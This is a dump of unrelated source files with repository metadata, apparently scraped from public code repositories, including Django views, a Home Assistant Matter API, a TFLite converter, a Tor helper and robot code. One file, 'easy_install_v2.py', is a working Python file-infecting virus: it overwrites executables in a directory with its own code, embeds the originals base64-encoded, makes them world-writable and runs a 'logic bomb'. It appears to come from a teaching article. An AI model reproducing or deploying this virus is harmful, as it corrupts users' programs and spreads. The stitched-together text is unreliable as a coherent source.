image_url_url = forms.URLField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
image_extern = forms.BooleanField(required=False)
is_wide = forms.BooleanField(required=False)
is_important = forms.BooleanField(required=False)
if profi_mode:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'style':'width:100%;'}) )
else:
info_slot_right= forms.CharField(required=False, widget=forms.Textarea(
attrs={'rows':10, 'cols':60, 'id':'ta2', 'style':'width:100%;'}) )
section = forms.CharField(required=False,
widget=forms.Select(choices=get_parent_section_choices(item_container),
attrs={'size':4, 'style':'width:40%'} ) )
has_user_support = forms.BooleanField(required=False)
has_comments = forms.BooleanField(required=False)
is_moderated = forms.BooleanField(required=False)
is_browseable = forms.BooleanField(required=False)
visible_start = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
visible_end = forms.DateField(input_formats=['%d.%m.%Y'],
widget=forms.TextInput(attrs={'size':10}))
show_next = forms.BooleanField(required=False)
integer_4 = forms.ChoiceField(choices=get_choices_new_protected(), widget=forms.RadioSelect() )
app_name = 'discussboard'
my_title = _(u'Diskussionsforum ändern')
data_init = {
'title' : decode_html(item_container.item.title),
'nav_title' : decode_html(item_container.container.nav_title),
'sub_title' : item_container.item.sub_title,
'text' : remove_link_icons(item_container.item.text),
'text_more' : remove_link_icons(item_container.item.text_more),
'image_url' : item_container.item.image_url,
'image_url_url' : item_container.item.image_url_url,
'image_extern' : item_container.item.image_extern,
'is_wide' : item_container.item.is_wide,
'is_important' : item_container.item.is_important,
'info_slot_right' : info_slot_to_header(item_container.item.info_slot_right),
'section' : decode_html(item_container.section),
'has_comments' : item_container.item.has_comments,
'has_user_support': item_container.item.has_user_support,
'is_moderated' : item_container.item.is_moderated,
'is_browseable' : item_container.is_browseable,
'visible_start' : item_container.visible_start,
'visible_end' : item_container.visible_end,
'integer_4' : item_container.item.integer_4
}
if request.method == 'POST' :
data = request.POST.copy ()
else :
data = data_init
f = dms_itemForm ( data )
    # --- Order, headings, help texts // special case: start page
tabs = [
('tab_base' , ['title', 'sub_title', 'nav_title', 'section', ]),
('tab_intro' , ['text', 'text_more', 'image_url', 'image_url_url', 'image_extern',
'is_wide', 'is_important']),
('tab_user_support', ['has_user_support', 'integer_4', 'is_moderated', 'has_comments']),
('tab_frame' , ['info_slot_right',]),
('tab_visibility', ['is_browseable', 'visible_start', 'visible_end',]),
]
content = get_tabbed_form(tabs, help_form, app_name ,f)
if request.method == 'POST' and not f.errors :
save_values(item_container, data_init, f.data)
return HttpResponseRedirect(get_site_url(item_container, 'index.html'))
else :
vars = get_folderish_vars_edit(request, item_container, app_name, my_title, content, f, get_dont())
return render_to_response ( 'app/base_edit.html', vars )
|
[
"[email protected]"
] | |
7faacb9fdcd5f1ce0dc6e1a0c84d359a98b04453
|
3f2d56b2191e0aa0b9bae2f6023deee9f2f444be
|
/Libs_et_Modules/easy_install_v2.py
|
732f9124122e336aff75fb51dd532bace00f6510
|
[] |
no_license
|
goffinet/GLMF201
|
8c5a11c7d4a631a95098ae00bc9509929df0a7ca
|
0213ca0fe8cb7bdbee54a128788a7d079394afcb
|
refs/heads/master
| 2021-01-21T11:22:50.099598 | 2017-01-18T14:00:14 | 2017-01-18T14:00:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,566 |
py
|
#!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contains the program's binary code
ftcLines = b''.join(ftcLines)
# Determine where the original executable code is located
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contains the virus code
# original contains the original binary code
# Erase the executable, write the Python code, then append the binary code
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Logic bomb
bomb()
# Execution of the original code
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
|
[
"[email protected]"
] | |
6da13e87abfd10017f1f682867f5f982147bbccc
|
f8ff25224bf827406c65560e247e7c3c064cdd38
|
/convert_savedmodel_keras_tflite.py
|
a64597fe955a1644762330369f48a47086e88b20
|
[] |
no_license
|
akinoriosamura/PFLD
|
893cadbbdc8a7ef424327c814196e1e3608f937f
|
b3f3c74369c1a8dc4dc0d2e5266dd2b473dfd582
|
refs/heads/master
| 2021-06-17T15:06:05.468485 | 2020-12-10T09:39:08 | 2020-12-10T09:39:08 | 211,257,866 | 0 | 0 | null | 2019-09-27T07:09:04 | 2019-09-27T07:09:03 | null |
UTF-8
|
Python
| false | false | 468 |
py
|
import tensorflow as tf
# Load the saved keras model back.
k_model = tf.keras.models.load_model(
"SavedModelPre",
custom_objects=None,
compile=True
)
# k_model = tf.keras.experimental.load_from_saved_model("SavedModelPre")
k_model.summary()
k_model.save('model.h5', include_optimizer=False)
converter = tf.lite.TFLiteConverter.from_keras_model_file("model.h5")
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
|
[
"[email protected]"
] | |
deb4be375223c47ca23cf76acf8592ff12a33e4b
|
6430d2572c4d6dfe41e0e30e725271444cc6f675
|
/torsurvey/torapi.py
|
6a8d9874f0eeda2ccf1457658601340cd0f124c6
|
[] |
no_license
|
nikcub/torsurvey
|
5a0c36560801862d5cf1c74f362ae013e0458f27
|
6e9ce5793694857dd5c451905a4a7aa773bfd2b6
|
refs/heads/master
| 2016-09-05T10:47:13.578465 | 2015-01-27T15:37:07 | 2015-01-27T15:37:07 | 26,388,609 | 1 | 1 | null | 2015-01-27T15:37:07 | 2014-11-09T07:18:27 |
Python
|
UTF-8
|
Python
| false | false | 1,580 |
py
|
#!/usr/bin/env python
"""
torsurvey.torapi
"""
import requesocks as requests
import requesocks.exceptions
# import hmac
# import hashlib
# import json
import logging
# from time import time
class TorAPI(object):
headers = {
'User-Agent' : 'torsurvey-',
}
tor_host = None
tor_port = None
proxy_tor = {
"http": "socks5://127.0.0.1:9030",
"https": "socks5://127.0.0.1:9030"
}
def __init__(self, proxy_host='127.0.0.1', proxy_port='9040', proxy_type='socks5', timeout=10):
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.timeout = timeout
self.proxy = {}
self.proxy['http'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.proxy['https'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.session = requesocks.session()
self.session.proxies = self.proxy
logging.debug("Established session with proxies %s" % str(self.proxy))
def get_ip(self):
r = self.req('http://ifconfig.me/ip')
if r.status_code == 200:
return r.text
return 'Error'
def get_headers(self):
headers = self.headers
# @TODO add headers
return headers
def req(self, url, extras={}):
try:
r = self.session.request('GET', url, allow_redirects=True, timeout=self.timeout, headers=self.headers)
return r
except requesocks.exceptions.ConnectionError, e:
logging.error("Bad connection cannot connect to %s" % url)
return -1
except Exception, e:
logging.error("%s: %s" % (url, e))
return -1
|
[
"[email protected]"
] | |
4261205d147bd377b81a8fb578bf7586b1f999d2
|
296132d2c5d95440b3ce5f4401078a6d0f736f5a
|
/homeassistant/components/matter/api.py
|
36cf83fd0dab7563414b7bed72aa10b48494fe9e
|
[
"Apache-2.0"
] |
permissive
|
mezz64/home-assistant
|
5349a242fbfa182159e784deec580d2800173a3b
|
997d4fbe5308b01d14ceabcfe089c2bc511473dd
|
refs/heads/dev
| 2023-03-16T22:31:52.499528 | 2022-12-08T02:55:25 | 2022-12-08T02:55:25 | 68,411,158 | 2 | 1 |
Apache-2.0
| 2023-03-10T06:56:54 | 2016-09-16T20:04:27 |
Python
|
UTF-8
|
Python
| false | false | 4,458 |
py
|
"""Handle websocket api for Matter."""
from __future__ import annotations
from collections.abc import Callable
from functools import wraps
from typing import Any
from matter_server.client.exceptions import FailedCommand
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api import ActiveConnection
from homeassistant.core import HomeAssistant, callback
from .adapter import MatterAdapter
from .const import DOMAIN
ID = "id"
TYPE = "type"
@callback
def async_register_api(hass: HomeAssistant) -> None:
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_commission)
websocket_api.async_register_command(hass, websocket_commission_on_network)
websocket_api.async_register_command(hass, websocket_set_thread_dataset)
websocket_api.async_register_command(hass, websocket_set_wifi_credentials)
def async_get_matter_adapter(func: Callable) -> Callable:
"""Decorate function to get the MatterAdapter."""
@wraps(func)
async def _get_matter(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
"""Provide the Matter client to the function."""
matter: MatterAdapter = next(iter(hass.data[DOMAIN].values()))
await func(hass, connection, msg, matter)
return _get_matter
def async_handle_failed_command(func: Callable) -> Callable:
"""Decorate function to handle FailedCommand and send relevant error."""
@wraps(func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
*args: Any,
**kwargs: Any,
) -> None:
"""Handle FailedCommand within function and send relevant error."""
try:
await func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission",
vol.Required("code"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Add a device to the network and commission the device."""
await matter.matter_client.commission_with_code(msg["code"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission_on_network",
vol.Required("pin"): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission_on_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Commission a device already on the network."""
await matter.matter_client.commission_on_network(msg["pin"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_thread",
vol.Required("thread_operation_dataset"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_thread_dataset(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set thread dataset."""
await matter.matter_client.set_thread_operational_dataset(
msg["thread_operation_dataset"]
)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_wifi_credentials",
vol.Required("network_name"): str,
vol.Required("password"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_wifi_credentials(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set WiFi credentials for a device."""
await matter.matter_client.set_wifi_credentials(
ssid=msg["network_name"], credentials=msg["password"]
)
connection.send_result(msg[ID])
|
[
"[email protected]"
] | |
bd91cb8c7e9e1344cfd7f3d1410c23d658e9438d
|
ba054fa1ec409011444e9c6b963309745e150d6f
|
/ps_bole_calculs_statiques/xc_model_impact/loadStateData.py
|
69e20459fe07531c2303bcc316ffa946b24e867d
|
[] |
no_license
|
berndhahnebach/XCmodels
|
a6500fdde253dea10ef2bb64b7ebc3dbfc2577c2
|
4acdd7747abd7cd71f5ef580f65e93359560e5a9
|
refs/heads/master
| 2020-04-02T23:36:36.385054 | 2018-10-20T16:49:21 | 2018-10-20T16:49:21 | 154,873,006 | 0 | 0 | null | 2018-10-26T17:52:36 | 2018-10-26T17:52:35 | null |
UTF-8
|
Python
| false | false | 5,140 |
py
|
# -*- coding: utf-8 -*-
'''In this script we define default data of load cases to be used (or changed)
while displaying loads or results associated to single load cases
'''
from postprocess.reports import graphical_reports
'''
Definition of record objects with these attributes:
loadCaseName: name of the load case to be depicted
loadCaseDescr: description text of the load case
loadCaseExpr: mathematical expression to define the load case (ex:
'1.0*GselfWeight+1.0*DeadLoad')
setsToDispLoads: ordered list of sets of elements to display loads
setsToDispBeamLoads: ordered list of sets of beam elements to display loads
(defaults to [])
compElLoad: component of load on beam elements to be represented
available components: 'axialComponent', 'transComponent',
'transYComponent','transZComponent'
unitsScaleLoads: factor to apply to loads if we want to change
the units (defaults to 1).
unitsLoads: text to especify the units in which loads are
represented (defaults to 'units:[m,kN]')
vectorScaleLoads: factor to apply to the vectors length in the
representation of loads (defaults to 1 -> auto-scale).
vectorScalePointLoads: factor to apply to the vectors length in the
representation of nodal loads (defaults to 1).
multByElemAreaLoads: boolean value that must be True if we want to
represent the total load on each element
(=load multiplied by element area) and False if we
are going to depict the value of the uniform load
per unit area (defaults to False)
listDspRot: ordered list of displacement or rotations to be displayed
available components: 'uX', 'uY', 'uZ', 'rotX', rotY', 'rotZ'
(defaults to ['uX', 'uY', 'uZ'])
setsToDispDspRot: ordered list of sets of elements to display displacements
or rotations
unitsScaleDispl: factor to apply to displacements if we want to change
the units (defaults to 1).
unitsDispl: text to specify the units in which displacements are
represented (defaults to '[m]'
listIntForc: ordered list of internal forces to be displayed as scalar field
over «shell» elements
available components: 'N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'
(defaults to ['N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'])
setsToDispIntForc: ordered list of sets of elements (of type «shell»)to
display internal forces
listBeamIntForc: ordered list of internal forces to be displayed
as diagrams on lines for «beam» elements
available components: 'N', 'My', 'Mz', 'Qy', 'Qz','T'
(defaults to ['N', 'My', 'Mz', 'Qy', 'Qz','T'])
setsToDispBeamIntForc: ordered list of sets of elements (of type «beam»)to
display internal forces (defaults to [])
scaleDispBeamIntForc: tuple (escN,escQ,escM) corresponding to the scales to
apply to displays of, respectively, N Q and M beam internal
forces (defaults to (1.0,1.0,1.0))
unitsScaleForc: factor to apply to internal forces if we want to change
the units (defaults to 1).
unitsForc: text to specify the units in which forces are
represented (defaults to '[kN/m]')
unitsScaleMom: factor to apply to internal moments if we want to change
the units (defaults to 1).
unitsMom: text to specify the units in which bending moments are
represented (defaults to '[kN.m/m]')
viewName: name of the view that contains the renderer (available standard
views: "XYZPos", "XYZNeg", "XPos", "XNeg","YPos", "YNeg",
"ZPos", "ZNeg", "+X+Y+Z", "+X+Y-Z", "+X-Y+Z", "+X-Y-Z",
"-X+Y+Z", "-X+Y-Z",
"-X-Y+Z", "-X-Y-Z") (defaults to "XYZPos")
hCamFct: factor that applies to the height of the camera position
in order to change perspective of isometric views
(defaults to 1, usual values 0.1 to 10)
viewNameBeams: name of the view for beam elements displays (defaults to "XYZPos")
hCamFctBeams: factor that applies to the height of the camera position for
beam displays (defaults to 1)
'''
A1=graphical_reports.RecordLoadCaseDisp(loadCaseName='A1',loadCaseDescr='A1: impact on parapet head',loadCaseExpr='1.0*A1',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A1.unitsScaleLoads= 1e-3
A1.unitsScaleForc= 1e-3
A1.unitsScaleMom= 1e-3
A1.unitsScaleDispl= 1e3
A1.viewName= "-X+Y+Z"
A1.unitsDispl='[mm]'
A2=graphical_reports.RecordLoadCaseDisp(loadCaseName='A2',loadCaseDescr='A2: impact on parapet body',loadCaseExpr='1.0*A2',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A2.unitsScaleLoads= 1e-3
A2.unitsScaleForc= 1e-3
A2.unitsScaleMom= 1e-3
A2.unitsScaleDispl= 1e3
A2.viewName= "-X+Y+Z"
A2.unitsDispl='[mm]'
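# Hedged illustration (not one of the original load cases): any of the attributes
# documented in the module docstring can be overridden on a record in the same way, e.g.
# A2.listDspRot = ['uX', 'uY', 'uZ', 'rotX']
# A2.scaleDispBeamIntForc = (1.0, 1.0, 1.0)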
|
[
"[email protected]"
] | |
81d343fe13a8e35e1122f366e78878bab4d952e7
|
8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f
|
/tests/test_person.py
|
43307a82a22e73117afeea3e18ab139709902ab1
|
[
"MIT"
] |
permissive
|
ngzhian/pycrunchbase
|
58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808
|
ead7c93a51907141d687da02864a3803d1876499
|
refs/heads/master
| 2023-07-08T06:18:59.314695 | 2023-07-03T13:27:06 | 2023-07-03T13:27:06 | 30,629,033 | 69 | 45 |
MIT
| 2020-12-02T02:26:40 | 2015-02-11T03:39:14 |
Python
|
UTF-8
|
Python
| false | false | 1,950 |
py
|
from datetime import datetime
from unittest import TestCase
from pycrunchbase import Person
PERSON_DATA = {
"uuid": "uuid",
"type": "Person",
"properties": {
"permalink": "first-last",
"last_name": "Last",
"first_name": "First",
"bio": "Bio",
"role_investor": True,
"born_on": "2000-01-02",
"born_on_trust_code": 7,
"is_deceased": False,
"died_on": None,
"died_on_trust_code": 0,
"created_at": 1233271545,
"updated_at": 1419596914,
},
"relationships": {
"news": {
"cardinality": "OneToMany",
"paging": {
"total_items": 2,
"first_page_url": "https://api.crunchbase.com/v3.1/person/first-last/news",
"sort_order": "created_at DESC"
},
"items": [
{
"url": "http://example.com/news_1/",
"author": "Author 1",
"posted_on": "2012-12-28",
"type": "PressReference",
"title": "Title 1",
"created_at": 1356743058,
"updated_at": 2012
},
{
"url": "example.com/news_2/",
"author": "Author 2",
"posted_on": "2012-04-20",
"type": "PressReference",
"title": "Title 2",
"created_at": 1334962777,
"updated_at": 2012
},
]
}
}
}
class PersonTestCase(TestCase):
def test_properties(self):
person = Person(PERSON_DATA)
self.assertEqual(person.permalink, 'first-last')
self.assertEqual(person.last_name, 'Last')
self.assertEqual(person.first_name, 'First')
self.assertEqual(person.bio, 'Bio')
self.assertEqual(person.role_investor, True)
self.assertEqual(person.born_on, datetime(2000, 1, 2))
self.assertEqual(person.born_on_trust_code, 7)
self.assertEqual(person.is_deceased, False)
self.assertEqual(person.died_on, None)
self.assertEqual(person.died_on_trust_code, 0)
def test_relationships(self):
person = Person(PERSON_DATA)
self.assertIsNotNone(person.news)
self.assertEqual(2, len(person.news))
|
[
"[email protected]"
] | |
8d53e43ebb62761b82dede6505a974d381b4e938
|
28c0bcb13917a277cc6c8f0a34e3bb40e992d9d4
|
/koku/reporting/migrations/0109_remove_ocpusagelineitemdailysummary_pod.py
|
7fc341bdb4450847e431947e91154a91e5a14a73
|
[
"Apache-2.0"
] |
permissive
|
luisfdez/koku
|
43a765f6ba96c2d3b2deda345573e1d97992e22f
|
2979f03fbdd1c20c3abc365a963a1282b426f321
|
refs/heads/main
| 2023-06-22T13:19:34.119984 | 2021-07-20T12:01:35 | 2021-07-20T12:01:35 | 387,807,027 | 0 | 1 |
Apache-2.0
| 2021-07-20T13:50:15 | 2021-07-20T13:50:14 | null |
UTF-8
|
Python
| false | false | 284 |
py
|
# Generated by Django 2.2.11 on 2020-03-27 19:21
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting", "0108_auto_20200405_1316")]
operations = [migrations.RemoveField(model_name="ocpusagelineitemdailysummary", name="pod")]
|
[
"[email protected]"
] | |
30a1390b789e4bd86190b477b462d67108f7a4a3
|
e1857e582609640f60923ea461da3e84c498095a
|
/block2-datatypes/numbers/number-demo.py
|
671907978a108eb946e216b4c5cc6293cf1ca1c1
|
[] |
no_license
|
mbaeumer/python-challenge
|
178f188004e66c5c4092af51ae5d496679d39dec
|
4cff4a4939268a496117158b0be4e20f4d934213
|
refs/heads/master
| 2023-08-07T22:43:35.490777 | 2023-07-21T21:26:46 | 2023-07-21T21:26:46 | 75,015,661 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,063 |
py
|
#!/usr/bin/env python3
from decimal import Decimal
from decimal import DecimalException
import random
def get_user_input():
answer = ""
while answer == "":
answer = input("Please enter a number: ")
return answer
def convert_to_int(s):
try:
print(int(s))
except ValueError:
print("Cannot convert to int")
def convert_to_float(s):
try:
print(float(s))
except ValueError:
print("Cannot convert to float")
def convert_to_decimal(s):
try:
print(Decimal(s))
except DecimalException:
print("Cannot convert to Decimal")
def determine_type(answer):
return type(answer)
# showing difference in precision of float vs decimal
def diff_decimal_float():
print("Difference between Decimal and float")
x = Decimal("0.1")
y = float("0.1")
print(f"{x:.20f}")
print(f"{y:.20f}")
def calc_with_decimals():
print("Calculating with decimals")
x = Decimal(34)
y = Decimal(7)
z = x / y
print(f"{z:.20f}")
def calc_with_floats():
print("Calculating with floats")
a = 34
b = 7
c = a/b
print(f"{c:.20f}")
def format_number(number):
print("Formatting alternatives")
print("{:.2f}".format(number))
print("{:+.2f}".format(number))
print("{:.0f}".format(number))
print("{:0>2d}".format(5))
print("{:,}".format(1000000))
print("{:.2%}".format(number))
print("{:.2e}".format(number))
print("{:10d}".format(50))
print("{:<10d}".format(50))
print("{:^10d}".format(50))
def generate_random_numbers():
random1 = random.randint(1,6) # 1..6
random2 = random.randrange(6) # 0..5
print("Generating random numbers")
print("With randint: ", random1)
print("With randrange: ", random2)
def operators_for_ints():
a = 5
b = 2
print("5/2 = %d" % (a/b))
print("5%%2 = %d" % (a%b))
print("5//2 = %d" % (a//b))
answer = get_user_input()
print(type(answer))
convert_to_int(answer)
convert_to_float(answer)
convert_to_decimal(answer)
diff_decimal_float()
calc_with_decimals()
calc_with_floats()
format_number(34/7)
generate_random_numbers()
operators_for_ints()
# TODO:
# currency
|
[
"[email protected]"
] | |
08e6e9616fe6a91d63adef510f938ac99e569b81
|
9249f87109471de1fc3f3c3c1b121f51c09df683
|
/lesson_3/test_10.py
|
89d99c4f00ee36886084f1928bbce7ee094081ba
|
[] |
no_license
|
anton1k/mfti-homework
|
400a8213a57e44478d65437f5afef0432e8e84ea
|
93683de329e6cb0001e713214aeb3069f6e213b0
|
refs/heads/master
| 2020-07-18T23:41:11.473608 | 2020-01-12T10:58:16 | 2020-01-12T10:58:16 | 206,335,501 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 652 |
py
|
# The sequence consists of natural numbers and ends with the number 0. No more than 10000 numbers are entered (not counting the terminating 0). Determine how many elements of this sequence are equal to its largest element. The numbers following the 0 do not need to be read.
d = 0
s = 0
while True:
x = int(input())
if x == 0:
break
if x > d:
d, s = x, 1
elif x == d:
s += 1
print(s)
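# Worked example (illustrative): for the input 4 7 7 0 the maximum is 7 and occurs
# twice, so the program prints 2.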
|
[
"[email protected]"
] | |
a66ea0e584b1c0c16a1073e306b633b0ae4bd795
|
3da102290ebe6c186474ecbeec9065ea2e5357e3
|
/pi/robot.py
|
4d162feefe0008daae6f7e2e33d88865d9c46d45
|
[] |
no_license
|
fo-am/penelopean-robotics
|
55cbbebe29f15fe5996222a5db36040ac400b8f3
|
2a6f81a4d8b098ac513bd42df980e64128df8a1b
|
refs/heads/master
| 2022-05-28T17:46:36.579042 | 2022-05-19T13:35:47 | 2022-05-19T13:35:47 | 134,366,263 | 8 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,976 |
py
|
import yarnasm
import radio
import time
# things we want to be able to do:
# * tweak servo defaults
# * queue of messages to send?
class robot:
def __init__(self,address):
self.address=address
self.telemetry=[0 for i in range(256)]
self.code=[]
self.source=""
self.state="running"
self.ping_time=time.time()
self.watchdog_timeout=10
self.ping_duration=2
self.start_walking=False
self.set_led=False
self.led_state=False
def pretty_print(self):
out = "robot: "+str(self.telemetry[yarnasm.registers["ROBOT_ID"]])+"\n"
out+= "pc: "+str(self.telemetry[yarnasm.registers["PC_MIRROR"]])+"\n"
out+= "a: "+str(self.telemetry[yarnasm.registers["A"]])+"\n"
out+= "step: "+str(self.telemetry[yarnasm.registers["STEP_COUNT"]])+"\n"
def telemetry_callback(self,data):
if self.state=="disconnected" or self.state=="waiting":
self.state="connected"
self.telemetry=data
#print("telemetry: "+str(self.address[4])+" "+str(data[0])+" "+str(data[9]))
self.ping_time=time.time()
def sync(self,radio,beat,ms_per_beat):
reg_sets = []
# update A register here, based on if the start flag has been set
if self.start_walking:
reg_sets+=[[yarnasm.registers["A"],1]]
self.start_walking=False
if self.set_led:
reg_sets+=[[yarnasm.registers["LED"],self.led_state]]
telemetry = radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
if telemetry!=[]:
self.telemetry = telemetry
print("telemetry: "+str(self.address[4])+" "+str(self.telemetry[0])+" "+str(self.telemetry[9]))
# stop update requesting telemetry for a bit
self.ping_time=time.time()
def sync2(self,radio,beat,ms_per_beat):
reg_sets = []
radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
def walk_pattern(self,pat,ms_per_step,radio):
radio.send_pattern(self.address,pat,ms_per_step)
def calibrate(self,radio,do_cali,samples,mode):
return radio.send_calibrate(self.address,do_cali,samples,mode)
def load_asm(self,fn,compiler,radio):
with open(fn, 'r') as f:
self.source=f.read()
self.code = compiler.assemble_file(fn)
return radio.send_code(self.address,self.code)
def send_asm(self,asm,compiler,radio):
self.code = compiler.assemble_bytes(asm)
return radio.send_code(self.address,self.code)
def write(self,addr,val,radio):
radio.send_set(self.address,addr,val)
def save_eeprom(self,radio):
radio.send_save_eeprom(self.address)
# A register is cleared when the robot reaches it's end position
# and set by the Pi when we are ready to start again
def start_walking_set(self):
self.start_walking=True
def led_set(self,state):
self.set_led=True
self.led_state=state
# has been set above, and returned in a telemetry packet...
def is_walking(self):
return self.telemetry[yarnasm.registers["A"]]==1
def update(self,radio):
pass
def update_regs(self,regs):
regs["state"]=self.state
regs["ping"]=time.time()-self.ping_time
regs["pc"]=self.telemetry[yarnasm.registers["PC_MIRROR"]]
regs["a"]=self.telemetry[yarnasm.registers["A"]]
regs["b"]=self.telemetry[yarnasm.registers["B"]]
regs["comp_angle"]=self.telemetry[yarnasm.registers["COMP_ANGLE"]]
regs["comp_dr"]=self.telemetry[yarnasm.registers["COMP_DELTA_RESET"]]
regs["comp_d"]=self.telemetry[yarnasm.registers["COMP_DELTA"]]
regs["step_count"]=self.telemetry[yarnasm.registers["STEP_COUNT"]]
regs["step_reset"]=self.telemetry[yarnasm.registers["STEP_COUNT_RESET"]]
regs["robot"]=self.telemetry[yarnasm.registers["ROBOT_ID"]]
|
[
"[email protected]"
] | |
17ba77f176141d459e81985f43e229f7ca668faf
|
d6d4449df702ab59a13559aaba599c60381d1852
|
/tests/rot_enc_test.py
|
1a121982d07371e9b5706f6ec0329ecc102aefc0
|
[
"CC-BY-4.0"
] |
permissive
|
zzfd97/StickIt-RotaryEncoder
|
c58ce2758676285d6ce539e895b6a5d01b451396
|
78c5511192fd471e57bc9b6b6ab5d1393ecdb0f3
|
refs/heads/master
| 2021-12-12T18:56:36.702963 | 2017-02-12T04:00:09 | 2017-02-12T04:00:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,614 |
py
|
# /***********************************************************************************
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# * 02111-1307, USA.
# *
# * (c)2013 - X Engineering Software Systems Corp. (www.xess.com)
# ***********************************************************************************/
from xstools.xsdutio import * # Import funcs/classes for PC <=> FPGA link.
print '''\n
##################################################################
# This program tests the interface between the host PC and the FPGA
# on the XuLA board that has been programmed to scan a rotary encoder.
# You should see the state of the rotary encoder accumulator
# displayed on the screen.
##################################################################
'''
USB_ID = 0 # This is the USB port index for the XuLA board connected to the host PC.
ROTENC1_ID = 1 # This is the identifier for the rotary encoder 1 interface in the FPGA.
ROTENC2_ID = 2 # This is the identifier for the rotary encoder 2 interface in the FPGA.
BUTTONS_ID = 3 # This is the identifier for the buttons on rotary encoders 1 & 2.
# Create an interface object that reads one 32-bit output from the rotary encoder module and
# drives one 1-bit dummy-input to the rotary encoder module.
